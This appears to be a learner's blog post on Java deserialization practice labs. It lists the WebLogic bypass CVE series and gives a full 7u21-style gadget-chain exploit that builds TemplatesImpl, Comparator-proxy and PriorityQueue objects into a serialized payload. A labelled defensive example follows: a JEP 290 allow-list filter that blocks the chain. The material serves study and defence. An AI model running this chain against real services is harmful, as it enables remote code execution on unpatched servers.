I've recently been going back over some Java basics that I had forgotten, and found an online practice range that suits a beginner like me.
lab6-8
These appear to correspond to the series of WebLogic deserialization bypasses:
CVE-2015-4852 -> CVE-2016-0638 -> CVE-2016-3510 -> CVE-2017-3248 -> CVE-2018-2628 -> CVE-2018-2893 -> CVE-2018-????. If you're interested, look them up yourself; they are all basically the same idea.
lab9
At first I didn't realise this was a rewrite of the 7u21 chain. Only after finishing it and going back to reread Java漫谈 did it come back to me.
```java
package Payload;

import Utils.Encode;
import Utils.SerializeUtil;          // assumed: the lab's helper next to Utils.Encode (not shown on the page)
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import marshalsec.util.Reflections;  // the helper the original code references fully qualified below
import javax.xml.transform.Templates;
import java.lang.reflect.Field;
import java.lang.reflect.Proxy;
import java.math.BigInteger;
import java.util.Comparator;
import java.util.PriorityQueue;

// MyInvocationHandler is the lab's own handler class (the 7u21-style stand-in for
// AnnotationInvocationHandler); it is not shown on the page.
public class exp {
    public static void main(String[] args) throws Exception {
        // TemplatesImpl carrying the class bytes that run when newTransformer() is reached
        TemplatesImpl tmpl = new TemplatesImpl();
        Field bytecodes = Reflections.getField(tmpl.getClass(), "_bytecodes");
        Reflections.setAccessible(bytecodes);
        Reflections.setFieldValue(tmpl, "_bytecodes", new byte[][]{SerializeUtil.getTemplatesImpl("xxxxxx")});
        Field name = Reflections.getField(tmpl.getClass(), "_name");
        Reflections.setAccessible(name);
        Reflections.setFieldValue(tmpl, "_name", "s");
        Reflections.setFieldValue(tmpl, "_tfactory", new TransformerFactoryImpl());

        // Comparator proxy whose handler forwards calls to the Templates interface
        MyInvocationHandler s = new MyInvocationHandler(Templates.class);
        Comparator comparator = (Comparator) Proxy.newProxyInstance(
                exp.class.getClassLoader(), new Class[]{Comparator.class}, s);   // original had exp7.class, which does not exist here

        // PriorityQueue: its readObject() re-heapifies and calls comparator.compare() on the elements
        PriorityQueue<Object> queue = new PriorityQueue(2);
        queue.add(new BigInteger("1"));
        queue.add(new BigInteger("2"));
        Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
        queueArray[0] = tmpl;

        Field field = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
        field.setAccessible(true);
        field.set(queue, comparator);

        System.out.print(Encode.objectToHexString(queue));
    }
}
```
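For the defensive side, an added example that is not part of the original post or the lab: a JEP 290 allow-list deserialization filter that stops the carrier classes this chain depends on (PriorityQueue, the generated Comparator proxy, TemplatesImpl) before their readObject() logic runs. It assumes Java 9+ (java.io.ObjectInputFilter); the class and method names are my own.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.PriorityQueue;

public class FilteredDeserializer {
    // Allow-list: only the types this endpoint legitimately expects, a depth cap,
    // and a final "!*" that rejects everything else. Any stream whose class
    // descriptors name PriorityQueue, a $Proxy class or TemplatesImpl is refused
    // at the descriptor stage, so the comparator/newTransformer() path is never reached.
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            "java.lang.String;java.lang.Integer;java.lang.Number;maxdepth=5;!*");

    public static Object readTrusted(byte[] data) throws Exception {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.setObjectInputFilter(FILTER);
            return in.readObject();
        }
    }

    static byte[] serialize(Object o) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return bos.toByteArray();
    }

    // true if the filter stopped deserialization (InvalidClassException "filter status: REJECTED")
    static boolean isRejected(byte[] data) throws Exception {
        try {
            readTrusted(data);
            return false;
        } catch (InvalidClassException e) {
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println(readTrusted(serialize("hello")));
        // Constructed stand-in for the lab payload: a plain PriorityQueue is already
        // enough to be rejected, whatever comparator or elements it carries.
        PriorityQueue<Integer> carrier = new PriorityQueue<>();
        carrier.add(1);
        System.out.println(isRejected(serialize(carrier)));
    }
}
```

On Java 8u121 and later the same filter is available as sun.misc.ObjectInputFilter, or process-wide via the jdk.serialFilter system property.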